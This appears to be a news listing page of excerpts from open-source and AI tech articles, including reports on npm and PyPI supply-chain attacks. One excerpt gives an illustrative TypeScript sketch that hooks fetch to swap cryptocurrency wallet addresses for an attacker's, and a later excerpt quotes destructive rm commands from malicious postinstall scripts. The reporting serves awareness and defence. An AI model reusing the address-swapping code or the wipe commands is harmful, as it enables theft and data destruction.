Open Source


Software packages with more than 2 billion weekly downloads hit in supply-chain attack

Hackers planted malicious code in open source software packages with more than 2 billion weekly downloads in what is likely the world’s biggest supply-chain attack ever.

The attack, which compromised nearly two dozen packages hosted on the npm repository, came to public notice on Monday in social media posts. Around the same time, Josh Junon, a maintainer or co-maintainer of the affected packages, said he had been “pwned” after falling for an email that claimed his account on the platform would be closed unless he logged in to a site and updated his two-factor authentication credentials.

Defeating 2FA the easy way

“Sorry everyone, I should have paid more attention,” Junon, who uses the moniker Qix, wrote. “Not like me; have had a stressful week. Will work to get this cleaned up.”

The unknown attackers behind the account compromise wasted no time capitalizing on it. Within an hour, dozens of open source packages Junon oversees had received updates that added malicious code for diverting cryptocurrency payments to attacker-controlled wallets. The addition, spanning more than 280 lines of code, monitored infected systems for cryptocurrency transactions and swapped the addresses of wallets receiving payments with ones controlled by the attacker.
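
Based on that description, the core trick is interception and substitution: hook a communication pathway and rewrite any wallet address that passes through it. The TypeScript below is a minimal illustrative sketch of that general pattern, not the actual malicious code; the attacker address is made up, and the Ethereum-style address regex is an assumption.

// Attacker-controlled destination (made-up value for illustration).
const ATTACKER_WALLET = "0x1111111111111111111111111111111111111111";

// Matches the rough shape of an Ethereum-style address.
const ADDRESS_RE = /0x[a-fA-F0-9]{40}/g;

// Wrap the runtime's fetch so any wallet address inside an outgoing
// request body is silently replaced before the request is sent.
const realFetch = globalThis.fetch;
globalThis.fetch = async (input, init) => {
  if (typeof init?.body === "string") {
    init = { ...init, body: init.body.replace(ADDRESS_RE, ATTACKER_WALLET) };
  }
  return realFetch(input, init);
};

Because the swap happens inside a patched runtime primitive, anything the user sees on screen can still show the intended address while the outgoing request carries the attacker’s.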

The packages that were compromised, which at last count numbered 20, included some of the most foundational code driving the JavaScript ecosystem. They are used directly and also have thousands of dependents, meaning other npm packages that don’t work unless these foundational packages are also installed. (npm is the official code repository for JavaScript files.)

“The overlap with such high-profile projects significantly increases the blast radius of this incident,” researchers from security firm Socket said. “By compromising Qix, the attackers gained the ability to push malicious versions of packages that are indirectly depended on by countless applications, libraries, and frameworks.”

The researchers added: “Given the scope and the selection of packages impacted, this appears to be a targeted attack designed to maximize reach across the ecosystem.”

The email message Junon fell for came from an email address at support.npmjs.help, a domain created three days ago to mimic the official npmjs.com used by npm. It said Junon’s account would be closed unless he updated information related to his 2FA—which requires users to present a physical security key or supply a one-time passcode provided by an authenticator app in addition to a password when logging in.



Microsoft open-sources Bill Gates’ 6502 BASIC from 1978

On Wednesday, Microsoft released the complete source code for Microsoft BASIC for 6502 Version 1.1, the 1978 interpreter that powered the Commodore PET, VIC-20, Commodore 64, and Apple II through custom adaptations. The company posted 6,955 lines of assembly language code to GitHub under an MIT license, allowing anyone to freely use, modify, and distribute the code that helped launch the personal computer revolution.

“Rick Weiland and I (Bill Gates) wrote the 6502 BASIC,” Gates commented on the Page Table blog in 2010. “I put the WAIT command in.”

For millions of people in the late 1970s and early 1980s, variations of Microsoft’s BASIC interpreter provided their first experience with programming. Users could type simple commands like “10 PRINT ‘HELLO’” and “20 GOTO 10” to create an endless loop of text on their screens, for example—often their first taste of controlling a computer directly. The interpreter translated these human-readable commands into instructions that the processor could execute, one line at a time.
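
To make that line-at-a-time execution model concrete, here is a toy TypeScript sketch, purely illustrative and in no way Microsoft’s design, of how a line-numbered interpreter dispatches those two statements (capped at five steps so the endless loop terminates):

// A program is a map from line numbers to statements.
const program = new Map<number, string>([
  [10, "PRINT 'HELLO'"],
  [20, "GOTO 10"],
]);

const lines = [...program.keys()].sort((a, b) => a - b);
let pc: number | undefined = lines[0];
for (let steps = 0; pc !== undefined && steps < 5; steps++) {
  const stmt = program.get(pc)!;
  if (stmt.startsWith("PRINT")) {
    console.log(stmt.slice(6).replace(/'/g, "")); // strip the quotes
    pc = lines[lines.indexOf(pc) + 1];            // fall through to the next line
  } else if (stmt.startsWith("GOTO")) {
    pc = Number(stmt.slice(5));                   // a jump just resets the line pointer
  }
}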

The Commodore PET (Personal Electronic Transactor), released in January 1977, used the MOS 6502 and ran a variation of Microsoft BASIC. Credit: SSPL/Getty Images

At just 6,955 lines of assembly language, Microsoft’s low-level 6502 code talked almost directly to the processor. The BASIC squeezed remarkable functionality into minimal memory, a key achievement when RAM cost hundreds of dollars per kilobyte.

In the early personal computer space, cost was king. The MOS 6502 processor that ran this BASIC cost about $25, while competitors charged $200 for similar chips. Designer Chuck Peddle created the 6502 specifically to bring computing to the masses, and manufacturers built variations of the chip into the Atari 2600, Nintendo Entertainment System, and millions of Commodore computers.

The deal that got away

In 1977, Commodore licensed Microsoft’s 6502 BASIC for a flat fee of $25,000. Jack Tramiel’s company got perpetual rights to ship the software in unlimited machines—no royalties, no per-unit fees. While $25,000 seemed substantial then, Commodore went on to sell millions of computers with Microsoft BASIC inside. Had Microsoft negotiated a per-unit licensing fee, as it did with later products, the deal could have generated tens of millions in revenue.

The version Microsoft released—labeled 1.1—contains bug fixes that Commodore engineer John Feagans and Bill Gates jointly implemented in 1978 when Feagans traveled to Microsoft’s Bellevue offices. The code includes memory management improvements (called “garbage collection” in programming terms) and shipped as “BASIC V2” on the Commodore PET.



New AI model turns photos into explorable 3D worlds, with caveats

Training with automated data pipeline

Voyager builds on Tencent’s earlier HunyuanWorld 1.0, released in July. Voyager is also part of Tencent’s broader “Hunyuan” ecosystem, which includes the Hunyuan3D-2 model for text-to-3D generation and the previously covered HunyuanVideo for video synthesis.

To train Voyager, researchers developed software that automatically analyzes existing videos to estimate camera movements and calculate depth for every frame—eliminating the need for humans to manually label thousands of hours of footage. The system processed over 100,000 video clips from both real-world recordings and the aforementioned Unreal Engine renders.
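
That description suggests each clip gets distilled into per-frame supervision signals roughly like the following. This is a hypothetical schematic with invented field names, not Tencent’s actual data format:

// Hypothetical shape of one automatically labeled training frame:
// the camera pose comes from automatic tracking and the depth map
// from estimation, with no human annotation anywhere in the loop.
interface FrameSample {
  rgb: Uint8Array;       // raw video frame pixels
  depth: Float32Array;   // estimated per-pixel depth
  cameraPose: number[];  // estimated camera extrinsics (e.g., a flattened 4x4 matrix)
}

type TrainingClip = FrameSample[]; // one of the ~100,000 processed clips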


A diagram of the Voyager world creation pipeline. Credit: Tencent

The model demands serious computing power to run, requiring at least 60GB of GPU memory for 540p resolution, though Tencent recommends 80GB for better results. Tencent published the model weights on Hugging Face and included code that works with both single and multi-GPU setups.

The model comes with notable licensing restrictions. Like other Hunyuan models from Tencent, the license prohibits usage in the European Union, the United Kingdom, and South Korea. Additionally, commercial deployments serving over 100 million monthly active users require separate licensing from Tencent.

On the WorldScore benchmark developed by Stanford University researchers, Voyager reportedly achieved the highest overall score of 77.62, compared to 72.69 for WonderWorld and 62.15 for CogVideoX-I2V. The model reportedly excelled in object control (66.92), style consistency (84.89), and subjective quality (71.09), though it placed second in camera control (85.95) behind WonderWorld’s 92.98. WorldScore evaluates world generation approaches across multiple criteria, including 3D consistency and content alignment.

While these self-reported benchmark results seem promising, wider deployment still faces challenges due to the computational muscle involved. For developers needing faster processing, the system supports parallel inference across multiple GPUs using the xDiT framework. Running on eight GPUs delivers processing speeds 6.69 times faster than single-GPU setups.
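
As a point of reference, that multi-GPU figure implies strong scaling:

6.69 / 8 ≈ 0.84

or roughly 84 percent of ideal linear speedup across eight GPUs.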

Given the processing power required and the limitations in generating long, coherent “worlds,” it may be a while before we see real-time interactive experiences using a similar technique. But as we’ve seen so far with experiments like Google’s Genie, we’re potentially witnessing very early steps into a new interactive, generative art form.



College student’s “time travel” AI experiment accidentally outputs real 1834 history

A hobbyist developer building AI language models that speak Victorian-era English “just for fun” got an unexpected history lesson this week when his latest creation mentioned real protests from 1834 London—events the developer didn’t know had actually happened until he Googled them.

“I was interested to see if a protest had actually occurred in 1834 London and it really did happen,” wrote Reddit user Hayk Grigorian, who is a computer science student at Muhlenberg College in Pennsylvania.

For the past month, Grigorian has been developing what he calls TimeCapsuleLLM, a small AI language model (like a pint-sized distant cousin to ChatGPT) which has been trained entirely on texts from 1800–1875 London. Grigorian wants to capture an authentic Victorian voice in the AI model’s outputs. As a result, the AI model ends up spitting out text that’s heavy with biblical references and period-appropriate rhetorical excess.

Grigorian’s project joins a growing field of research into what some call “Historical Large Language Models” (HLLMs), though those projects typically start from larger base models than Grigorian’s small one. Similar projects include MonadGPT, trained on 11,000 texts from 1400 to 1700 CE, which can discuss topics using 17th-century knowledge frameworks, and XunziALLM, which generates classical Chinese poetry following ancient formal rules. These models offer researchers a chance to interact with the linguistic patterns of past eras.

According to Grigorian, TimeCapsuleLLM’s most intriguing recent output emerged from a simple test. When he prompted it with “It was the year of our Lord 1834,” the AI model—which is trained to continue text from wherever a user leaves off—generated the following:

It was the year of our Lord 1834 and the streets of London were filled with protest and petition. The cause, as many re counted, was not bound in the way of private, but having taken up the same day in the day of Lord Palmerston, the public will receive a short statement of the difficulties under which the day of law has reached us. It is a matter of deep regret, that the present events in the history of the world are clear, and consequently will be’known. It is not true that the very men who first settled in the Gospel at Jerusalem should have so extensive and so interesting a record of the prosperity and prosperity

Curious about the accuracy, Grigorian did some fact-checking. “The output also brought up Lord Palmerston,” he wrote, “and after a google search I learned that his actions resulted in the 1834 protests.”



OpenAI releases its first open source models since 2019

OpenAI is releasing new generative AI models today, and no, GPT-5 is not one of them. Depending on how you feel about generative AI, these new models may be even more interesting, though. The company is rolling out gpt-oss-120b and gpt-oss-20b, its first open weight models since the release of GPT-2 in 2019. You can download and run these models on your own hardware, with support for simulated reasoning, tool use, and deep customization.

When you access the company’s proprietary models in the cloud, they’re running on powerful server infrastructure that cannot be easily replicated, even in an enterprise setting. The new OpenAI models come in two variants (120b and 20b) designed to run on less powerful hardware configurations. Both are transformers with configurable chain of thought (CoT), supporting low, medium, and high settings. The lower settings are faster and use fewer compute resources, but outputs are better at the highest setting. You can set the CoT level with a single line in the system prompt.
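
As a rough sketch of what that looks like in practice, assuming a local OpenAI-compatible server such as one run with vLLM or Ollama (the endpoint URL and model name below are placeholders, and the “Reasoning:” system-prompt convention is drawn from OpenAI’s gpt-oss documentation):

const res = await fetch("http://localhost:8000/v1/chat/completions", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    model: "gpt-oss-20b",
    messages: [
      // The single system-prompt line that selects the CoT effort level.
      { role: "system", content: "Reasoning: high" },
      { role: "user", content: "Walk me through a proof sketch of the triangle inequality." },
    ],
  }),
});
const data = await res.json();
console.log(data.choices[0].message.content);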

The smaller gpt-oss-20b has a total of 21 billion parameters, utilizing mixture-of-experts (MoE) to reduce that to 3.6 billion parameters per token. As for gpt-oss-120b, its 117 billion parameters come down to 5.1 billion per token with MoE. The company says the smaller model can run on a consumer-level machine with 16GB or more of memory. To run gpt-oss-120b, you need 80GB of memory, which is more than you’re likely to find in the average consumer machine. It should fit on a single AI accelerator GPU like the Nvidia H100, though. Both models have a context window of 128,000 tokens.
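
Expressed as the fraction of weights active for any single token, those figures work out to:

3.6B / 21B ≈ 17 percent for gpt-oss-20b
5.1B / 117B ≈ 4.4 percent for gpt-oss-120b

which is why the memory footprint tracks the total parameter count while per-token compute tracks the much smaller active count.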


The team says users of gpt-oss can expect robust performance similar to OpenAI’s leading cloud-based models. The larger one benchmarks between the o3 and o4-mini proprietary models in most tests, with the smaller version running just a little behind. It gets closest in math and coding tasks. In the knowledge-based Humanity’s Last Exam, o3 is far out in front with 24.9 percent (with tools), while gpt-oss-120b only manages 19 percent. For comparison, Google’s leading Gemini Deep Think hits 34.8 percent in that test.



Blender developers begin work on full-fledged mobile version

To that end, some features developed for the mobile version of Blender will cross-pollinate to desktop, like icon support for sidebar tabs and a helper overlay with curated shortcuts, among other things.

You can see some mockups over at the Blender blog. Development has begun in earnest on a new, separate branch for this tablet application. It will be developed first to target the iPad Pro and Apple Pencil, with other platforms and tablets to get tailored support later.

It sounds like the team already has some knowledgeable designers and developers on this branch, but the blog post is also an invitation for new contributors. Specifically, it calls for “developers with extensive experience in this area” to contribute to building the application, touch events and gestures support, “File System / iCloud / AirDrop support,” and OpenSubdiv.

It sounds like things are already moving relatively quickly, as a tech demo is planned for SIGGRAPH 2025 in Vancouver next month.



Supply-chain attacks on open source software are getting out of hand

sudo rm -rf --no-preserve-root /

The --no-preserve-root flag is specifically designed to override safety protections that would normally prevent deletion of the root directory.

A postinstall script included this Windows-equivalent destructive command:

rm /s /q

Socket published a separate report Wednesday on yet more supply-chain attacks, one targeting npm users and another targeting users of PyPI. As of Wednesday, the four malicious packages—three published to npm and the fourth on PyPI—collectively had been downloaded more than 56,000 times. Socket said it was working to get them removed.

When installed, the packages “covertly integrate surveillance functionality into the developer’s environment, enabling keylogging, screen capture, fingerprinting, webcam access, and credential theft,” Socket researchers wrote. They added that the malware monitored and captured user activity and transmitted it to attacker-controlled infrastructure. Socket used the term surveillance malware to emphasize the covert observation and data exfiltration tactics “in the context of malicious dependencies.”

Last Friday, Socket reported the third attack. This one compromised an account on npm and used the access to plant malicious code inside three packages available on the site. The compromise occurred after the attackers successfully obtained a credential token that the developer used to authenticate to the site.

The attackers obtained the credential through a targeted phishing attack Socket had disclosed hours earlier. The email instructed the recipient to log in through a URL on npnjs.com, a typosquatted spoof of the official npmjs.com domain. To make the attack more convincing, the phishing URL contained a token field that mimicked the tokens npm uses for authentication; it took the format https://npnjs.com/login?token=xxxxxx, where xxxxxx represented the token.


A phishing email targeting npm account holders. Credit: Socket

Also compromised was an npm package known as ‘is.’ It receives roughly 2.8 million downloads weekly.

Potential for widespread damage

Supply-chain attacks like the ones Socket has flagged have the potential to cause widespread damage. Many packages available in repositories are dependencies, meaning downstream packages must incorporate them in order to work. In many developer flows, new dependency versions are downloaded and incorporated into downstream packages automatically.
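
As a concrete illustration of that flow, a single caret range in package.json is enough for a routine install to pick up a freshly published malicious patch release. The snippet below is hypothetical, though it uses the real “is” package from the list that follows:

{
  "dependencies": {
    "is": "^3.3.0"
  }
}

With that range, a fresh npm install resolves to the newest 3.x version, so a compromised 3.3.1 arrives with no change to the project’s own code. Committing a lockfile and pinning exact versions narrows that window.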

The packages flagged in the three attacks are:

  • @toptal/picasso-tailwind
  • @toptal/picasso-charts
  • @toptal/picasso-shared
  • @toptal/picasso-provider
  • @toptal/picasso-select
  • @toptal/picasso-quote
  • @toptal/picasso-forms
  • @xene/core
  • @toptal/picasso-utils
  • @toptal/picasso-typography
  • is, versions 3.3.1 and 5.0.0
  • got-fetch, versions 5.1.11 and 5.1.12
  • eslint-config-prettier, versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7
  • eslint-plugin-prettier, versions 4.2.2 and 4.2.3
  • synckit, version 0.11.9
  • @pkgr/core, version 0.2.8
  • napi-postinstall, version 0.3.1

Developers who work with any of the packages targeted should ensure none of the malicious versions have been installed or incorporated into their wares. Developers working with open source packages should:

  • Monitor repository visibility changes in search of suspicious or unusual publishing of packages
  • Review package.json lifecycle scripts before installing dependencies (see the sketch after this list)
  • Use automated security scanning in continuous integration and continuous delivery pipelines
  • Regularly rotate authentication tokens
  • Use multifactor authentication to safeguard repository accounts
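
One way to act on the lifecycle-script item above is to disable install scripts by default and opt back in selectively. ignore-scripts is a real npm configuration flag, though whether it fits a given workflow depends on which dependencies legitimately need install hooks. Placed in a project’s .npmrc:

ignore-scripts=true

With this set, a malicious postinstall payload, like the destructive rm commands above, never executes at install time; packages that rely on legitimate build hooks then need those steps run explicitly.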

Additionally, repositories that haven’t yet made MFA mandatory should do so in the near future.



White House unveils sweeping plan to “win” global AI race through deregulation

Trump’s plan was not welcomed by everyone. J.B. Branch, Big Tech accountability advocate for Public Citizen, in a statement provided to Ars, criticized Trump as giving “sweetheart deals” to tech companies that would cause “electricity bills to rise to subsidize discounted power for massive AI data centers.”

Infrastructure demands and energy requirements

Trump’s new AI plan tackles infrastructure head-on, stating that “AI is the first digital service in modern life that challenges America to build vastly greater energy generation than we have today.” To meet this demand, it proposes streamlining environmental permitting for data centers through new National Environmental Policy Act (NEPA) exemptions, making federal lands available for construction and modernizing the power grid—all while explicitly rejecting “radical climate dogma and bureaucratic red tape.”

The document embraces what it calls a “Build, Baby, Build!” approach—echoing a Trump campaign slogan—and promises to restore semiconductor manufacturing through the CHIPS Program Office, though stripped of “extraneous policy requirements.”

On the technology front, the plan directs Commerce to revise NIST’s AI Risk Management Framework to “eliminate references to misinformation, Diversity, Equity, and Inclusion, and climate change.” Federal procurement would favor AI developers whose systems are “objective and free from top-down ideological bias.” The document strongly backs open source AI models and calls for exporting American AI technology to allies while blocking administration-labeled adversaries like China.

Security proposals include high-security military data centers and warnings that advanced AI systems “may pose novel national security risks” in cyberattacks and weapons development.

Critics respond with “People’s AI Action Plan”

Before the White House unveiled its plan, more than 90 organizations launched a competing “People’s AI Action Plan” on Tuesday, characterizing the Trump administration’s approach as “a massive handout to the tech industry” that prioritizes corporate interests over public welfare. The coalition includes labor unions, environmental justice groups, and consumer protection nonprofits.



Scientists once hoarded pre-nuclear steel; now we’re hoarding pre-AI content

A time capsule of human expression

Graham-Cumming is no stranger to tech preservation efforts. He’s a British software engineer and writer best known for creating POPFile, an open source email spam filtering program, and for successfully petitioning the UK government to apologize for its persecution of codebreaker Alan Turing—an apology that Prime Minister Gordon Brown issued in 2009.

As it turns out, his pre-AI website isn’t new, but it has languished unannounced until now. “I created it back in March 2023 as a clearinghouse for online resources that hadn’t been contaminated with AI-generated content,” he wrote on his blog.

The website points to several major archives of pre-AI content, including a Wikipedia dump from August 2022 (before ChatGPT’s November 2022 release), Project Gutenberg’s collection of public domain books, the Library of Congress photo archive, and GitHub’s Arctic Code Vault—a snapshot of open source code buried in a former coal mine near the North Pole in February 2020. The wordfreq project appears on the list as well, flash-frozen from a time before AI contamination made its methodology untenable.

The site accepts submissions of other pre-AI content sources through its Tumblr page. Graham-Cumming emphasizes that the project aims to document human creativity from before the AI era, not to make a statement against AI itself. As atmospheric nuclear testing ended and background radiation returned to natural levels, low-background steel eventually became unnecessary for most uses. Whether pre-AI content will follow a similar trajectory remains a question.

Still, it feels reasonable to protect sources of human creativity now, including archival ones, because these repositories may become useful in ways that few appreciate at the moment. For example, in 2020, I proposed creating a so-called “cryptographic ark”—a timestamped archive of pre-AI media that future historians could verify as authentic, collected before my then-arbitrary cutoff date of January 1, 2022. AI slop pollutes more than the current discourse—it could cloud the historical record as well.

For now, lowbackgroundsteel.ai stands as a modest catalog of human expression from what may someday be seen as the last pre-AI era. It’s a digital archaeology project marking the boundary between human-generated and hybrid human-AI cultures. In an age where distinguishing between human and machine output grows increasingly difficult, these archives may prove valuable for understanding how human communication evolved before AI entered the chat.



Engineer creates first custom motherboard for 1990s PlayStation console

The nsOne project joins a growing community of homebrew PlayStation 1 hardware developments. Other recent projects include Picostation, a Raspberry Pi Pico-based optical disc emulator (ODE) that allows PlayStation 1 consoles to load games from SD cards instead of physical discs. Other ODEs like MODE and PSIO have also become popular solutions for retrogaming collectors who play games on original hardware as optical drives age and fail.

From repair job to reverse-engineering project

To understand the classic console’s physical architecture, Brodesco physically sanded down an original motherboard to expose its internal layers, then cross-referenced the exposed traces with component datasheets and service manuals.

“I realized that detailed documentation on the original motherboard was either incomplete or entirely unavailable,” Brodesco explained in his Kickstarter campaign. This discovery launched what would become a comprehensive documentation effort, including tracing every connection on the board and creating multi-layer graphic representations of the circuitry.


A photo of the nsOne PlayStation motherboard. Credit: Lorentio Brodesco

Using optical scanning and manual net-by-net reverse-engineering, Brodesco recreated the PlayStation 1’s schematic in modern PCB design software. This process involved creating component symbols with accurate pin mappings and identifying—or in some cases creating—the correct footprints for each proprietary component that Sony had never publicly documented.

Brodesco also identified what he calls the “minimum architecture” required to boot the console without BIOS modifications, streamlining the design process while maintaining full compatibility.

The mock-up board shown in photos validates the footprints of chips and connectors, all redrawn from scratch. According to Brodesco, a fully routed version with complete multilayer routing and final layout is already in development.


A photo of the nsOne PlayStation motherboard. Credit: Lorentio Brodesco

As Brodesco noted on Kickstarter, his project’s goal is to “create comprehensive documentation, design files, and production-ready blueprints for manufacturing fully functional motherboards.”

Beyond repairs, the documentation and design files Brodesco is creating would preserve the PlayStation 1’s hardware architecture for future generations: “It’s a tribute to the PS1, to retro hardware, and to the belief that one person really can build the impossible.”



Hugging Face clones OpenAI’s Deep Research in 24 hours

On Tuesday, Hugging Face researchers released an open source AI research agent called “Open Deep Research,” created by an in-house team as a 24-hour challenge following the launch of OpenAI’s Deep Research feature, which can autonomously browse the web and create research reports. The project seeks to match Deep Research’s performance while making the technology freely available to developers.

“While powerful LLMs are now freely available in open-source, OpenAI didn’t disclose much about the agentic framework underlying Deep Research,” writes Hugging Face on its announcement page. “So we decided to embark on a 24-hour mission to reproduce their results and open-source the needed framework along the way!”

Similar to both OpenAI’s Deep Research and Google’s implementation of its own “Deep Research” using Gemini (first introduced in December—before OpenAI), Hugging Face’s solution adds an “agent” framework to an existing AI model, allowing it to perform multi-step tasks such as collecting information and building up a report as it goes, which it then presents to the user at the end.
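
Hugging Face built its version in Python with its own smolagents library; the TypeScript below is only a schematic sketch of the general loop that sentence describes, with stubbed-out tool and model functions standing in for the real components:

type Decision = { tool?: string; input?: string; answer?: string };
type Tool = { name: string; run: (input: string) => Promise<string> };

// Stub tool and model so the sketch is self-contained; real versions
// would wrap a search API and an LLM endpoint.
const tools: Tool[] = [
  { name: "web_search", run: async (q) => `Top results for "${q}" ...` },
];

async function llm(history: string[]): Promise<Decision> {
  // A real call would send the history to a model; this stub gathers
  // one observation and then finishes.
  return history.some((h) => h.startsWith("Observation:"))
    ? { answer: "Synthesized report based on gathered observations." }
    : { tool: "web_search", input: "background for the task" };
}

async function runAgent(task: string, maxSteps = 10): Promise<string> {
  const history = [`Task: ${task}`];
  for (let step = 0; step < maxSteps; step++) {
    const d = await llm(history);      // model decides the next step
    if (d.answer) return d.answer;     // done: the report goes to the user
    const tool = tools.find((t) => t.name === d.tool);
    if (!tool) { history.push("Error: unknown tool"); continue; }
    history.push(`Observation: ${await tool.run(d.input ?? "")}`);
  }
  return "Step limit reached without a final answer.";
}

runAgent("Summarize the GAIA benchmark").then(console.log);

The loop is the whole trick: the model plans, a tool acts, and the result is appended to the context before the next decision.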

The open source clone is already racking up comparable benchmark results. After only a day’s work, Hugging Face’s Open Deep Research has reached 55.15 percent accuracy on the General AI Assistants (GAIA) benchmark, which tests an AI model’s ability to gather and synthesize information from multiple sources. OpenAI’s Deep Research scored 67.36 percent accuracy on the same benchmark.

As Hugging Face points out in its post, GAIA includes complex multi-step questions such as this one:

Which of the fruits shown in the 2008 painting “Embroidery from Uzbekistan” were served as part of the October 1949 breakfast menu for the ocean liner that was later used as a floating prop for the film “The Last Voyage”? Give the items as a comma-separated list, ordering them in clockwise order based on their arrangement in the painting starting from the 12 o’clock position. Use the plural form of each fruit.

To correctly answer that type of question, the AI agent must seek out multiple disparate sources and assemble them into a coherent answer. Many of the questions in GAIA represent no easy task, even for a human, so they test agentic AI’s mettle quite well.



German router maker is latest company to inadvertently clarify the LGPL license

The GNU General Public License (GPL) and its “Lesser” version (LGPL) are widely known and used. Still, every so often, a networking hardware maker has to get sued to make sure everyone knows how it works.

The latest such router company to face legal repercussions is AVM, the Berlin-based maker of the most popular home networking products in Germany. Sebastian Steck, a German software developer, bought an AVM Fritz!Box 4020 (PDF) and, being a certain type, requested the source code that had been used to generate certain versions of the firmware on it.

According to Steck’s complaint (translated to English and provided in PDF by the Software Freedom Conservancy, or SFC), he needed this code to recompile a networking library and add some logging to “determine which programs on the Fritz!Box establish connections to servers on the Internet and which data they send.” But Steck was also concerned about AVM’s adherence to GPL 2.0 and LGPL 2.1 licenses, under which its FRITZ!OS and various libraries were licensed. The SFC states that it provided a grant to Steck to pursue the matter.

AVM provided source code, but it was incomplete, as “the scripts for compilation and installation were missing,” according to Steck’s complaint. This included makefiles and details on environment variables, like “KERNEL_LAYOUT,” necessary for compilation. Steck notified AVM, AVM did not respond, and Steck sought legal assistance, ultimately including the SFC.

Months later, according to the SFC, AVM provided all the relevant source code and scripts, but the suit continued. AVM ultimately paid Steck’s attorney fees. The case proved, once again, that source code requirements are real, that the LGPL demands freedom despite its “Lesser” name, and that source code needs to be useful for making real changes to firmware—in German courts, at least.

“The favorable result of this lawsuit exemplifies the power of copyleft—granting users the freedom to modify, repair, and secure the software on their own devices,” the SFC said in a press release. “Companies like AVM receive these immense benefits themselves. This lawsuit reminded AVM that downstream users must receive those very same rights under copyleft.”

As noted by the SFC, the case was brought in July 2023, but as is typical with German law, no updates on the case could be provided until after its conclusion. SFC posted its complaint, documents, and the source code ultimately provided by AVM and encouraged the company to publish its own documents since those are not automatically public in Germany.
